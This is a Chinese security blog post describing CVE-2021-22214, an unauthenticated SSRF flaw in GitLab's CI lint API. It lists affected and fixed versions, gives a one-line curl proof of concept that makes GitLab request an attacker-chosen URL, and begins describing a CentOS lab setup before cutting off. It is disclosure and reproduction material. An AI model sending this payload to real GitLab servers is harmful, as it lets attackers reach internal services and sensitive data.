追洞计划 | 您所在的位置:网站首页 › GitLab Graphql邮箱信息泄露漏洞 CVE › 追洞计划 |
文章来源|MS08067 Web安全知识星球 本文作者:Taoing(Web安全攻防合伙人) GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务。 一、漏洞描述GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 CVE-2021-22214 GitLab存在前台未授权SSRF漏洞,未授权的攻击者也可以利用该漏洞执行SSRF攻击(CVE-2021-22214)。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。 影响版本:从 10.5 开始的所有版本 安全版本:官方当前最新的 13.12.2, 13.11.5 和 13.10.5 三、POC: curl -s --show-error -H 'Content-Type: application/json' https://example.gitlab.com/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://xx.xxx.xx.xx:port/api/v1/targets?test.yml"}' 四、漏洞复现: 1、环境搭建搭建环境介绍:CentOS7.6 1)首先按官网提示先安装依赖,然后执行下面命令添加yum源,选择gitlab-ce社区版 curl -s https://packages.gitlab.com/install/repositories/ |
CopyRight 2018-2019 实验室设备网 版权所有 |